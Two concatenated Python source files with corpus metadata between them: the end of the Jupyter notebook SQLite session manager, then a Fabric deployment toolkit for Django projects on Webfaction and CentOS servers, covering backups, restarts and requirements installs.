        """Creates a session and returns its model"""
        session_id = self.new_session_id()
        # Reuse an already-running kernel when the caller supplied a live id.
        if kernel_id is not None and kernel_id in self.kernel_manager:
            pass
        else:
            kernel_id = yield self.start_kernel_for_session(session_id, path, name, type, kernel_name)
        result = yield maybe_future(
            self.save_session(session_id, path=path, name=name, type=type, kernel_id=kernel_id)
        )
        # py2-compat
        raise gen.Return(result)

    @gen.coroutine
    def start_kernel_for_session(self, session_id, path, name, type, kernel_name):
        """Start a new kernel for a given session."""
        # allow contents manager to specify kernels cwd
        kernel_path = self.contents_manager.get_kernel_path(path=path)
        kernel_id = yield maybe_future(
            self.kernel_manager.start_kernel(path=kernel_path, kernel_name=kernel_name)
        )
        # py2-compat
        raise gen.Return(kernel_id)

    @gen.coroutine
    def save_session(self, session_id, path=None, name=None, type=None, kernel_id=None):
        """Saves the items for the session with the given session_id

        Given a session_id (and any other of the arguments), this method
        creates a row in the sqlite session database that holds the information
        for a session.

        Parameters
        ----------
        session_id : str
            uuid for the session; this method must be given a session_id
        path : str
            the path for the given session
        name: str
            the name of the session
        type: string
            the type of the session
        kernel_id : str
            a uuid for the kernel associated with this session

        Returns
        -------
        model : dict
            a dictionary of the session model
        """
        self.cursor.execute("INSERT INTO session VALUES (?,?,?,?,?)",
            (session_id, path, name, type, kernel_id)
        )
        result = yield maybe_future(self.get_session(session_id=session_id))
        raise gen.Return(result)

    @gen.coroutine
    def get_session(self, **kwargs):
        """Returns the model for a particular session.

        Takes a keyword argument and searches for the value in the session
        database, then returns the rest of the session's info.

        Parameters
        ----------
        **kwargs : keyword argument
            must be given one of the keywords and values from the session database
            (i.e. session_id, path, name, type, kernel_id)

        Returns
        -------
        model : dict
            returns a dictionary that includes all the information from the
            session described by the kwarg.
        """
        if not kwargs:
            raise TypeError("must specify a column to query")
        conditions = []
        # Validate columns while building the WHERE clause.
        for column in kwargs.keys():
            if column not in self._columns:
                raise TypeError("No such column: %r", column)
            conditions.append("%s=?" % column)
        query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
        self.cursor.execute(query, list(kwargs.values()))
        try:
            row = self.cursor.fetchone()
        except KeyError:
            # The kernel is missing, so the session just got deleted.
            row = None
        if row is None:
            q = []
            for key, value in kwargs.items():
                q.append("%s=%r" % (key, value))
            raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
        model = yield maybe_future(self.row_to_model(row))
        raise gen.Return(model)

    @gen.coroutine
    def update_session(self, session_id, **kwargs):
        """Updates the values in the session database.

        Changes the values of the session with the given session_id
        with the values from the keyword arguments.

        Parameters
        ----------
        session_id : str
            a uuid that identifies a session in the sqlite3 database
        **kwargs : str
            the key must correspond to a column title in session database,
            and the value replaces the current value in the session
            with session_id.
        """
        # Raises 404 first if the session does not exist.
        yield maybe_future(self.get_session(session_id=session_id))
        if not kwargs:
            # no changes
            return
        sets = []
        for column in kwargs.keys():
            if column not in self._columns:
                raise TypeError("No such column: %r" % column)
            sets.append("%s=?" % column)
        query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
        self.cursor.execute(query, list(kwargs.values()) + [session_id])

    def kernel_culled(self, kernel_id):
        """Checks if the kernel is still considered alive and returns true if its not found. """
        return kernel_id not in self.kernel_manager

    @gen.coroutine
    def row_to_model(self, row, tolerate_culled=False):
        """Takes sqlite database session row and turns it into a dictionary"""
        kernel_culled = yield maybe_future(self.kernel_culled(row['kernel_id']))
        if kernel_culled:
            # The kernel was culled or died without deleting the session.
            # We can't use delete_session here because that tries to find
            # and shut down the kernel - so we'll delete the row directly.
            #
            # If caller wishes to tolerate culled kernels, log a warning
            # and return None.  Otherwise, raise KeyError with a similar
            # message.
            self.cursor.execute("DELETE FROM session WHERE session_id=?",
                                (row['session_id'],))
            msg = "Kernel '{kernel_id}' appears to have been culled or died unexpectedly, " \
                  "invalidating session '{session_id}'. The session has been removed.".\
                format(kernel_id=row['kernel_id'],session_id=row['session_id'])
            if tolerate_culled:
                self.log.warning(msg + " Continuing...")
                raise gen.Return(None)
            raise KeyError(msg)

        kernel_model = yield maybe_future(self.kernel_manager.kernel_model(row['kernel_id']))
        model = {
            'id': row['session_id'],
            'path': row['path'],
            'name': row['name'],
            'type': row['type'],
            'kernel': kernel_model
        }
        if row['type'] == 'notebook':
            # Provide the deprecated API.
            model['notebook'] = {'path': row['path'], 'name': row['name']}
        raise gen.Return(model)

    @gen.coroutine
    def list_sessions(self):
        """Returns a list of dictionaries containing all the information from
        the session database"""
        c = self.cursor.execute("SELECT * FROM session")
        result = []
        # We need to use fetchall() here, because row_to_model can delete rows,
        # which messes up the cursor if we're iterating over rows.
        for row in c.fetchall():
            try:
                model = yield maybe_future(self.row_to_model(row))
                result.append(model)
            except KeyError:
                # Stale row; row_to_model already removed it.
                pass
        raise gen.Return(result)

    @gen.coroutine
    def delete_session(self, session_id):
        """Deletes the row in the session database with given session_id"""
        # get_session raises 404 if the session does not exist.
        session = yield maybe_future(self.get_session(session_id=session_id))
        yield maybe_future(self.kernel_manager.shutdown_kernel(session['kernel']['id']))
        self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "sserrot/champion_relationships",
"path": "venv/Lib/site-packages/notebook/services/sessions/sessionmanager.py",
"copies": "1",
"size": "10620",
"license": "mit",
"hash": -7185386996991418000,
"line_mean": 37.6181818182,
"line_max": 102,
"alpha_frac": 0.5959510358,
"autogenerated": false,
"ratio": 4.368572603866721,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.005891526665617668,
"num_lines": 275
} |
# A base file for use in fabfiles.
# This file is geared toward a particular directory structure on webfaction and in dev
# Some of it may be useful to other folks, but no guarantees.
# Local Structure
# /
# /db (sqllite for dev and dumps)
# /media
# /appname
# /source (psds and the like)
# Remote Structure (webfaction-based)
# ~/webapps/appname_live
# ~/webapps/appname_live/appname.git (live version)
# ~/webapps/appname_live/appname (symlinked -> # ~/webapps/appname_django/appname/appname)
# ~/webapps/appname_live/appname.wsgi
# ~/webapps/appname_static/ (symlinked* -> # ~/webapps/appname_django/appname/media/*)
# Usage
# Basic:
# from qi_toolkit.fabbase import *
# setup_env(project_name='projname',webfaction_user='username')
# Advanced
# from qi_toolkit.fabbase import *
# initial_settings = {
# 'media_dir':'static',
# }
# overrides = {
# 'workon': 'echo "no work today"',
# }
# setup_env(project_name='projname',webfaction_user='username', initial_settings=initial_settings, overrides=overrides)
from __future__ import with_statement # needed for python 2.5
from fabric.api import *
import fabric
from fabric.contrib.console import confirm
from qi_toolkit.helpers import print_exception
import time
def setup_env_webfaction(project_name, webfaction_user, initial_settings={}, overrides={}):
    """Populate fabric's global ``env`` for a webfaction-hosted project.

    ``initial_settings`` is applied before the derived values are computed
    (so it can influence them); ``overrides`` is applied last and wins.
    NOTE(review): the mutable-default dicts are shared across calls if ever
    mutated; they are only read here, so this is safe as written.
    """
    global env
    env.dry_run = False
    env.project_name = project_name
    env.webfaction_user = webfaction_user
    env.is_webfaction = True
    env.is_centos = False
    # Custom Config Start
    env.python_version = "2.6"
    env.parent = "origin"
    env.working_branch = "master"
    env.live_branch = "live"
    env.python = "python"
    env.is_local = False
    env.local_working_path = "~/workingCopy"
    env.media_dir = "media"
    env.webfaction_host = '%(webfaction_user)s@%(webfaction_user)s.webfactional.com' % env
    env.production_hosts = []
    env.staging_hosts = []
    env.production_db_hosts = []
    # Early hook: lets callers adjust the basics before derived paths below.
    env.update(initial_settings)
    # semi-automated. Override this for more complex, multi-server setups, or non-wf installs.
    env.production_hosts = ['%(webfaction_host)s' % env]
    env.user_home = "/home/%(webfaction_user)s" % env
    env.git_origin = "%(webfaction_host)s:%(user_home)s/git-root/%(project_name)s.git" % env
    env.daily_backup_script_name = "daily_backup.sh"
    env.weekly_backup_script_name = "weekly_backup.sh"
    env.monthly_backup_script_name = "monthly_backup.sh"
    env.staging_hosts = env.production_hosts
    env.virtualenv_name = env.project_name
    env.staging_virtualenv_name = "staging_%(project_name)s" % env
    env.live_app_dir = "%(user_home)s/webapps/%(project_name)s_live" % env
    env.live_static_dir = "%(user_home)s/webapps/%(project_name)s_static" % env
    env.staging_app_dir = "%(user_home)s/webapps/%(project_name)s_staging" % env
    env.staging_static_dir = "%(user_home)s/webapps/%(project_name)s_staging_static" % env
    env.virtualenv_path = "%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
    env.work_on = "workon %(virtualenv_name)s; " % env
    env.backup_root = "%(user_home)s/backups" % env
    env.offsite_backup_dir = "aglzen@quantumimagery.com:/home/aglzen/%(project_name)s/data/" % env
    # Final hook: overrides always win.
    env.update(overrides)
def setup_env_centos(project_name, system_user="root", initial_settings={}, overrides={}):
    """Populate fabric's global ``env`` for a CentOS-hosted project.

    Host lists must be supplied via ``initial_settings``; they are then
    prefixed with ``system_user@``. ``overrides`` is applied last and wins.
    """
    global env
    env.dry_run = False
    env.project_name = project_name
    env.system_user = system_user
    env.is_webfaction = False
    env.is_centos = True
    # Custom Config Start
    env.python_version = "2.6"
    env.parent = "origin"
    env.working_branch = "master"
    env.live_branch = "live"
    env.staging_branch = "staging"
    env.python = "python"
    env.is_local = False
    env.local_working_path = "~/workingCopy"
    env.media_dir = "media"
    env.admin_symlink = "admin"
    env.production_hosts = []
    env.staging_hosts = []
    env.production_db_hosts = []
    env.staging_db_hosts = []
    # Callers provide host names here; they get user-qualified below.
    env.update(initial_settings)
    env.production_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.production_hosts]
    env.staging_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.staging_hosts]
    env.production_db_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.production_db_hosts]
    env.staging_db_hosts = ["%(system_user)s@%(h)s" % {'system_user':env.system_user,'h':h} for h in env.staging_db_hosts]
    # root's home is /root, not /home/root.
    if env.system_user == "root":
        env.user_home = "/root"
    else:
        env.user_home = "/home/%(system_user)s" % env
    env.virtualenv_name = env.project_name
    env.staging_virtualenv_name = "staging_%(virtualenv_name)s" % env
    env.live_app_dir = "/var/www"
    env.git_path = "%(live_app_dir)s/%(project_name)s.git" % env
    env.live_static_dir = "%(git_path)s/media" % env
    # On CentOS staging shares the live checkout (single-server layout).
    env.staging_app_dir = env.live_app_dir
    env.staging_static_dir = env.live_static_dir
    env.virtualenv_path = "%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
    env.work_on = "workon %(virtualenv_name)s; " % env
    env.backup_root = "%(user_home)s/backups" % env
    env.offsite_backup_dir = "aglzen@quantumimagery.com:/home/aglzen/%(project_name)s/data/" % env
    # Final hook: overrides always win.
    env.update(overrides)
def setup_backup_env_webfaction():
    """Derive backup-related env values; called by the role selectors.

    Requires ``env.backup_dir`` to be set first (live/staging/localhost do
    this).  The *_backup_script() helpers are defined elsewhere in this
    file — presumably they render the shell scripts; verify there.
    """
    env.current_backup_file = "%(backup_dir)s/currentBackup.json" % env
    env.daily_backup_script = daily_backup_script()
    env.weekly_backup_script = weekly_backup_script()
    env.monthly_backup_script = monthly_backup_script()
def live(dry_run="False"):
    """Role selector: point fabric at the production deployment.

    Prompts for confirmation first; pass dry_run="True" to only print
    commands instead of running them.
    """
    if not confirm("You do mean live, right?"):
        abort("Bailing out!")  # raises, so nothing below runs
    env.dry_run = dry_run.lower() == "true"
    env.python = "python%(python_version)s" % env
    env.role = "live"
    env.settings_file = "envs.%(role)s" % env
    env.hosts = env.production_hosts
    env.base_path = env.live_app_dir
    env.git_path = "%(live_app_dir)s/%(project_name)s.git" % env
    env.backup_dir = "%(user_home)s/backups/%(project_name)s" % env
    env.media_path = env.live_static_dir
    env.pull_branch = env.live_branch
    env.release_tag = "%(role)s_release" % env
    setup_backup_env_webfaction()
def staging(dry_run="False"):
    """Role selector: point fabric at the staging deployment.

    NOTE(review): pull_branch is set to env.live_branch here, not
    env.staging_branch — confirm that staging really deploys 'live'.
    """
    env.dry_run = dry_run.lower() == "true"
    env.python = "python%(python_version)s" % env
    env.role = "staging"
    env.settings_file = "envs.%(role)s" % env
    env.hosts = env.staging_hosts
    env.base_path = env.staging_app_dir
    env.git_path = "%(staging_app_dir)s/%(project_name)s.git" % env
    env.media_path = env.staging_static_dir
    env.backup_dir = "%(user_home)s/backups/staging_%(project_name)s" % env
    env.pull_branch = env.live_branch
    env.release_tag = "%(role)s_release" % env
    # Staging runs inside its own virtualenv.
    env.virtualenv_name = env.staging_virtualenv_name
    env.virtualenv_path = "%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
    env.work_on = "workon %(virtualenv_name)s; " % env
    setup_backup_env_webfaction()
def localhost(dry_run="False"):
    """Role selector: run everything against the local working copy."""
    env.dry_run = dry_run.lower() == "true"
    env.hosts = ['localhost']
    env.role = "localhost"
    env.settings_file = "envs.dev" % env
    env.is_webfaction = False
    env.is_centos = False
    env.base_path = "%(local_working_path)s/%(project_name)s" % env
    env.git_path = env.base_path
    env.backup_dir = "%(local_working_path)s/db" % env
    env.pull_branch = env.working_branch
    env.release_tag = "%(role)s_release" % env
    env.virtualenv_path = "~/.virtualenvs/%(virtualenv_name)s/lib/python%(python_version)s/site-packages/" % env
    # is_local makes magic_run use fabric's local() instead of run().
    env.is_local = True
    env.media_path = "%(base_path)s/%(media_dir)s" % env
    setup_backup_env_webfaction()
def live_db():
    # Target only the production database hosts.
    env.hosts = env.production_db_hosts

def staging_db():
    # Target only the staging database hosts.
    env.hosts = env.staging_db_hosts

def live_celery():
    # Target only the production celery hosts (set via initial_settings).
    env.hosts = env.production_celery_hosts

def staging_celery():
    # Target only the staging celery hosts (set via initial_settings).
    env.hosts = env.staging_celery_hosts

def has_separate_celery_server():
    # True when a dedicated "<role>_celery_hosts" list was configured.
    return hasattr(env,"%s_celery_hosts" % env.role)

# Map of role names to their selector functions (non-standard use of
# fabric roledefs, which normally hold host strings).
# NOTE(review): 'local' maps to fabric's local() shell function, not the
# localhost() selector above — looks like a typo; confirm before relying on it.
env.roledefs = {
    'live': [live],
    'staging': [staging],
    'local':[local],
    'live_db':[live_db],
    'staging_db':[staging_db],
    'live_celery':[live_celery],
    'staging_celery':[staging_celery],
}
def safe(function_call, *args, **kwargs):
    """Call *function_call* and return its result, or None if it raises.

    Bug fix: the bare ``except:`` also swallowed SystemExit and
    KeyboardInterrupt — which fabric's abort() relies on — so failures
    could no longer abort a run.  Catch only Exception.
    """
    try:
        return function_call(*args, **kwargs)
    except Exception:
        return None
def safe_magic_run(function_call, *args, **kwargs):
    # Like magic_run, but a non-zero exit only warns instead of aborting
    # the whole fabric run.
    with settings(warn_only=True):
        return magic_run(function_call, *args, **kwargs)
# Custom Config End
def magic_run(function_call, custom_env=None):
global env
prev_env = env
if custom_env:
env = custom_env
if env.dry_run:
print function_call % c_env
else:
if env.is_local:
ret = local(function_call % env)
else:
ret = run(function_call % env)
env = prev_env
return ret
def setup_server():
    """One-shot provisioning: bootstrap tooling, clone the repo, wire up
    media/static symlinks, backups, and (remotely) apache + the WSGI file.
    """
    if env.is_webfaction:
        # Shell conveniences + virtualenvwrapper in the login shell.
        try:
            safe_magic_run("mkdir %(user_home)s/src")
            magic_run("echo \"alias l='ls -agl'\nalias python=python%(python_version)s\nexport WORKON_HOME=$HOME/.virtualenvs\nsource ~/bin/virtualenvwrapper.sh\" >> %(user_home)s/.bashrc")
        except:
            pass
        # Build git from source if it is not already installed.
        try:
            magic_run("git --version")
        except:
            env.git_file_version = "1.7.3.3"
            magic_run("cd src;wget http://kernel.org/pub/software/scm/git/git-%(git_file_version)s.tar.bz2")
            magic_run("cd %(user_home)s/src/; tar fxj git-%(git_file_version)s.tar.bz2;")
            magic_run("cd %(user_home)s/src/git-%(git_file_version)s; ./configure --prefix=%(user_home)s/git/; make; make install;")
            magic_run("echo \"export PATH=$PATH:/%(user_home)s/git/bin/\" >> %(user_home)s/.bashrc")
        # Bootstrap pip via easy_install if missing.
        try:
            magic_run("pip --version")
        except:
            try:
                # NOTE(review): trailing ':' looks like a typo — this creates
                # a directory literally named "lib:"; confirm intent.
                safe_magic_run("mkdir %(user_home)s/lib:")
            except:
                pass
            try:
                safe_magic_run("mkdir %(user_home)s/lib/python%(python_version)s")
            except:
                pass
            magic_run("easy_install-%(python_version)s pip")
        magic_run("pip install --upgrade pip virtualenv virtualenvwrapper")
    # Create the project virtualenv and its postactivate hooks.
    safe_magic_run("mkdir %(user_home)s/.virtualenvs")
    magic_run("mkvirtualenv --no-site-packages %(virtualenv_name)s;")
    magic_run("echo 'cd %(git_path)s/' > %(user_home)s/.virtualenvs/%(virtualenv_name)s/bin/postactivate")
    magic_run("echo 'export DJANGO_SETTINGS_MODULE=\"envs.%(role)s\"' >> %(user_home)s/.virtualenvs/%(virtualenv_name)s/bin/postactivate")
    magic_run("echo 'export PYTHONPATH=\"%(user_home)s/.virtualenvs/%(virtualenv_name)s/lib/site-packages/:%(base_path)s/%(project_name)s\"' >> %(user_home)s/.virtualenvs/%(virtualenv_name)s/bin/postactivate")
    # Clone the repository and check out the deployment branch.
    safe_magic_run("mkdir %(base_path)s")
    magic_run("git clone %(git_origin)s %(git_path)s")
    magic_run("%(work_on)s git checkout %(pull_branch)s; git pull")
    setup_media_symlinks()
    setup_project_symlinks()
    install_requirements()
    setup_backup_dir_and_cron()
    if not env.is_local:
        # Remove webfaction's sample project and wire apache to our WSGI app.
        safe_magic_run("rm -rf %(base_path)s/myproject; rm %(base_path)s/myproject.wsgi")
        # httpd.conf
        magic_run("mv %(base_path)s/apache2/conf/httpd.conf %(base_path)s/apache2/conf/httpd.conf.bak")
        magic_run("sed 'N;$!P;$!D;$d' %(base_path)s/apache2/conf/httpd.conf.bak > %(base_path)s/apache2/conf/httpd.conf")
        magic_run("echo 'WSGIPythonPath %(base_path)s:%(base_path)s/lib/python%(python_version)s:%(virtualenv_path)s' >> %(base_path)s/apache2/conf/httpd.conf")
        magic_run("echo 'WSGIScriptAlias / %(base_path)s/%(project_name)s.wsgi' >> %(base_path)s/apache2/conf/httpd.conf")
        # WSGI file
        magic_run("touch %(base_path)s/%(project_name)s.wsgi")
        magic_run("echo 'import os, sys' > %(base_path)s/%(project_name)s.wsgi")
        magic_run("echo 'from django.core.handlers.wsgi import WSGIHandler' >> %(base_path)s/%(project_name)s.wsgi")
        magic_run("echo \"sys.path = ['%(virtualenv_path)s','%(git_path)s/%(project_name)s','/usr/local/lib/python%(python_version)s/site-packages/', '%(git_path)s', '%(virtualenv_path)s../../../src/django-cms'] + sys.path\" >> %(base_path)s/%(project_name)s.wsgi")
        magic_run("echo \"os.environ['DJANGO_SETTINGS_MODULE'] = '%(project_name)s.envs.%(role)s'\" >> %(base_path)s/%(project_name)s.wsgi")
        magic_run("echo 'application = WSGIHandler()' >> %(base_path)s/%(project_name)s.wsgi")
        restart()
def make_wsgi_file():
    """(Re)write the project's WSGI entry-point file on the target host.

    NOTE(review): this version points DJANGO_SETTINGS_MODULE at
    '%(project_name)s.settings', while setup_server() uses
    '%(project_name)s.envs.%(role)s' — confirm which is intended.
    """
    magic_run("touch %(base_path)s/%(project_name)s.wsgi")
    magic_run("echo 'import os, sys' > %(base_path)s/%(project_name)s.wsgi")
    magic_run("echo 'from django.core.handlers.wsgi import WSGIHandler' >> %(base_path)s/%(project_name)s.wsgi")
    magic_run("echo \"sys.path = ['%(virtualenv_path)s','%(git_path)s/%(project_name)s','/usr/local/lib/python%(python_version)s/site-packages/', '%(git_path)s', '%(virtualenv_path)s../../../src/django-cms'] + sys.path\" >> %(base_path)s/%(project_name)s.wsgi")
    magic_run("echo \"os.environ['DJANGO_SETTINGS_MODULE'] = '%(project_name)s.settings'\" >> %(base_path)s/%(project_name)s.wsgi")
    magic_run("echo 'application = WSGIHandler()' >> %(base_path)s/%(project_name)s.wsgi")
def setup_media_symlinks():
    # Link everything under the repo's media dir into the served media path.
    safe_magic_run("cd %(media_path)s; ln -s %(git_path)s/%(media_dir)s/* .")

def setup_django_admin_media_symlinks():
    # Replace the admin symlink with the virtualenv's django admin media.
    magic_run("cd %(media_path)s; rm -rf %(admin_symlink)s; ln -s %(virtualenv_path)sdjango/contrib/admin/media %(admin_symlink)s")

def setup_cms_symlinks():
    # Link django-cms media into the served media path.
    magic_run("cd %(media_path)s; touch cms; rm cms; ln -s %(virtualenv_path)scms/media/cms .")

def setup_project_symlinks():
    # Project-specific hook; fabfiles override this as needed.
    pass
def pull(custom_env=None):
    """Updates the repository on the target host.

    Fix: this docstring previously sat as a bare string *inside* the
    webfaction branch, so the function appeared undocumented.
    On non-webfaction (CentOS) hosts the checkout is pinned to the
    release tag after fetching tags.
    """
    if env.is_webfaction:
        magic_run("cd %(git_path)s; git checkout %(pull_branch)s;git pull", custom_env)
    else:
        magic_run("cd %(git_path)s; git checkout %(pull_branch)s; git fetch --tags; git pull; git checkout %(release_tag)s", custom_env)
def git_reset(hash=""):
    """Reset the remote repository to the specified git hash.

    :param hash: commit-ish to hard-reset to; empty string resets to HEAD.
    """
    env.hash = hash
    # BUG FIX: the command previously used "%(work_on)" without the 's'
    # conversion, which raises ValueError ("unsupported format character")
    # as soon as the string is %-formatted against env.  Other commands in
    # this file (e.g. kill_pyc) show that work_on carries its own command
    # separator, so no extra ';' is added here.
    magic_run("%(work_on)s git reset --hard %(hash)s")
def ls():
    """List the contents of the deployment base directory."""
    # (Previous docstring was copy-pasted from git_reset and was wrong.)
    magic_run("cd %(base_path)s; ls")
def restart():
    """Alias for reboot(): restart the wsgi server."""
    return reboot()
def tag_commit_for_release():
    """Move the release tag to the current local commit and push tags.

    Deletes the local tag first so the tag can be re-pointed.
    """
    local("git tag -d %(release_tag)s; git tag %(release_tag)s; git push --tags" % env)
def reboot():
    "Reboot the wsgi server."
    if env.is_webfaction:
        # Webfaction's stop script is asynchronous: poll it until it
        # reports apache is down, then start again.
        shut_down = False
        while not shut_down:
            output = magic_run("%(base_path)s/apache2/bin/stop;")
            shut_down = (output.find("Apache is not running") != -1)
            if not shut_down:
                time.sleep(1)
        magic_run("%(base_path)s/apache2/bin/start;")
    elif env.is_centos:
        # CentOS: the project runs as a system service.
        magic_run("service %(project_name)s restart")
def stop():
    "Stop the wsgi server."
    # No-op on local development machines.
    if not env.is_local:
        if env.is_webfaction:
            magic_run("%(base_path)s/apache2/bin/stop;")
        elif env.is_centos:
            try:
                magic_run("service %(project_name)s stop")
            except:
                # Don't fail if it's already stopped.
                pass
def start():
    "Start the wsgi server."
    if env.is_webfaction:
        magic_run("%(base_path)s/apache2/bin/start;")
    elif env.is_centos:
        magic_run("service %(project_name)s start")
def nginx_reboot():
    """Restart nginx (CentOS targets only)."""
    if env.is_centos:
        magic_run("service nginx restart")
def nginx_stop():
    """Stop nginx (CentOS targets only)."""
    if env.is_centos:
        magic_run("service nginx stop")
def nginx_start():
    """Start nginx (CentOS targets only)."""
    if env.is_centos:
        magic_run("service nginx start")
def celery_env():
    """Return the env to use for celery commands.

    When a separate celery server is configured, the hosts list is
    replaced by the role-specific ``<role>_celery_hosts`` attribute.

    NOTE(review): ``c_env = env`` aliases the global fabric env rather
    than copying it, so the hosts override mutates shared state — confirm
    this is intended.
    """
    c_env = env
    if has_separate_celery_server():
        c_env.hosts = getattr(env,"%s_celery_hosts" % env.role)
    return c_env
def celery_pull():
    """Pull the repo on the celery host(s) (CentOS targets only)."""
    if env.is_centos:
        pull(celery_env())
def celery_restart():
    """Restart the project's celeryd service (CentOS targets only)."""
    if env.is_centos:
        magic_run("service celeryd-%(project_name)s restart", celery_env())
def celery_stop():
    """Stop the project's celeryd service (CentOS targets only)."""
    if env.is_centos:
        magic_run("service celeryd-%(project_name)s stop", celery_env())
def celery_start():
    """Start the project's celeryd service (CentOS targets only)."""
    if env.is_centos:
        magic_run("service celeryd-%(project_name)s start", celery_env())
def install_requirements(force_pip_upgrade=False, use_unstable=True, clear_source=True):
    "Install the requirements."
    # NOTE(review): default use_unstable=True here differs from the
    # quick_/safe_ wrappers below (both default False) — confirm intended.
    env.force_upgrade_string = ""
    if force_pip_upgrade:
        env.force_upgrade_string = "--upgrade"
    env.requirements = "requirements.stable.txt"
    if use_unstable:
        env.requirements = "requirements.txt"
    if clear_source:
        # Wipe pip's editable-source checkouts so they are re-fetched.
        magic_run("rm -rf %(virtualenv_path)s../../../src")
    magic_run("%(work_on)s pip install %(force_upgrade_string)s -q -r %(requirements)s" % env)
def quick_install_requirements(force_pip_upgrade=False, use_unstable=False, clear_source=False):
    "Install the requirements, but don't upgrade everything."
    install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable, clear_source=clear_source)
def safe_install_requirements(force_pip_upgrade=False, use_unstable=False, clear_source=True):
    "Install the requirements, and upgrade everything."
    install_requirements(force_pip_upgrade=force_pip_upgrade, use_unstable=use_unstable, clear_source=clear_source)
@runs_once
def backup_for_deploy():
    "Backup before deploys."
    # The presence of current_backup_file on disk is used as a lock: if a
    # previous deploy's backup file was left behind, the deploy aborts.
    import os.path
    if env.is_webfaction:
        env.current_backup_file = "%(backup_dir)s/currentDeployBackup.json" % env
        if not os.path.isfile(env.current_backup_file):
            magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py dumpdata --indent 4 > %(current_backup_file)s")
            magic_run("zip -r9q %(backup_dir)s/pre_deploy_`date +%%F`.zip %(current_backup_file)s; rm %(current_backup_file)s")
            # NOTE(review): the cp below runs after the rm above has
            # deleted current_backup_file — presumably is_local and
            # is_webfaction are mutually exclusive; confirm.
            if env.is_local:
                magic_run("cp %(current_backup_file)s %(git_path)s/db/all_data.json")
        else:
            abort("Deploy backup failed - previous deploy did not finish cleanly.")
    elif env.is_centos:
        env.current_backup_file = "%(backup_dir)s/currentDeployBackup.dump" % env
        if not os.path.isfile(env.current_backup_file):
            magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py dumpdb > %(current_backup_file)s")
            magic_run("bzip2 -9q %(current_backup_file)s; mv %(current_backup_file)s.bz2 %(backup_dir)s/pre_deploy_`date +%%F`.bz2 ;cp %(backup_dir)s/pre_deploy_`date +%%F`.bz2 %(backup_dir)s/latest_deploy.dump.bz2")
            if env.is_local:
                magic_run("cp %(current_backup_file)s %(git_path)s/db/all_data.json")
        else:
            abort("Deploy backup failed - previous deploy did not finish cleanly.")
@runs_once
def download_data_dump():
    """Take a fresh deploy backup, then fetch it to the local working path."""
    backup_for_deploy()
    get("%(backup_dir)s/latest_deploy.dump.bz2" % env, env.local_working_path)
    local("bunzip2 %(local_working_path)s/latest_deploy.dump.bz2" % env)
@runs_once
def load_data_dump_locally(local_file=None):
    """Restore a database dump into the local database, then delete it.

    :param local_file: path to the dump; defaults to the file fetched by
        download_data_dump().
    """
    env.local_file = local_file
    if not env.local_file:
        env.local_file = "%(local_working_path)s/latest_deploy.dump" % env
    local("%(work_on)s cd %(project_name)s; %(python)s manage.py restoredb < %(local_file)s" % env)
    local("rm %(local_file)s" % env)
@runs_once
def put_and_load_data_dump(local_file=None):
    """Upload a local dump to the remote host and restore it there.

    Prompts for confirmation when targeting the live role, since this
    overwrites the remote database.
    """
    if env.role != "live" or confirm("Wait, really? Really really??"):
        env.local_file = local_file
        if not env.local_file:
            env.local_file = "%(local_working_path)s/latest_deploy.dump" % env
        env.remote_file = "%(base_path)s/latest_deploy.dump" % env
        put(env.local_file, env.remote_file)
        magic_run("%(work_on)s cd %(project_name)s; %(python)s manage.py restoredb < %(remote_file)s")
        magic_run("rm %(remote_file)s")
@runs_once
def get_and_load_datadump():
    """Convenience task: download the remote dump and restore it locally."""
    download_data_dump()
    load_data_dump_locally()
@runs_once
def freeze_current_versions():
    """Pin the currently installed package versions into requirements.stable.txt."""
    local("pip freeze -r requirements.txt > requirements.stable.txt")
def setup_backup_dir_and_cron():
    # requires fabric and python-crontab installed on the target
    """Create backup dirs, write the three backup scripts, and install crontabs."""
    # mkdir may legitimately fail if the dirs already exist.
    safe_magic_run("mkdir %(backup_root)s")
    safe_magic_run("mkdir %(backup_dir)s")
    try:
        magic_run("echo '%(daily_backup_script)s' > %(backup_dir)s/%(daily_backup_script_name)s")
        magic_run("echo '%(weekly_backup_script)s' > %(backup_dir)s/%(weekly_backup_script_name)s")
        magic_run("echo '%(monthly_backup_script)s' > %(backup_dir)s/%(monthly_backup_script_name)s")
        magic_run("chmod +x %(backup_dir)s/%(daily_backup_script_name)s")
        magic_run("chmod +x %(backup_dir)s/%(weekly_backup_script_name)s")
        magic_run("chmod +x %(backup_dir)s/%(monthly_backup_script_name)s")
        # Run fab remotely on the target to register the cron entries.
        magic_run("%(work_on)s fab %(role)s setup_crontab")
    except:
        print "CRONTAB SETUP FAILED. Set up the crontabs manually."
def setup_crontab():
    """Install daily/weekly/monthly backup cron entries via python-crontab.

    Idempotent: each command is only added if not already present.
    Daily runs at 01:00, weekly Mondays at 02:00, monthly the 1st at 03:00.
    """
    try:
        from crontab import CronTab
        tab = CronTab()
        daily_command = "%(backup_dir)s/%(daily_backup_script_name)s > /dev/null 2>&1" % env
        weekly_command = "%(backup_dir)s/%(weekly_backup_script_name)s > /dev/null 2>&1" % env
        monthly_command = "%(backup_dir)s/%(monthly_backup_script_name)s > /dev/null 2>&1" % env
        changed = False
        if len(tab.find_command(daily_command)) == 0:
            daily_tab = tab.new(command=daily_command)
            daily_tab.hour().on(1)
            daily_tab.minute().on(0)
            changed = True
        if len(tab.find_command(weekly_command)) == 0:
            weekly_tab = tab.new(command=weekly_command)
            weekly_tab.dow().on(1)
            weekly_tab.hour().on(2)
            weekly_tab.minute().on(0)
            changed = True
        if len(tab.find_command(monthly_command)) == 0:
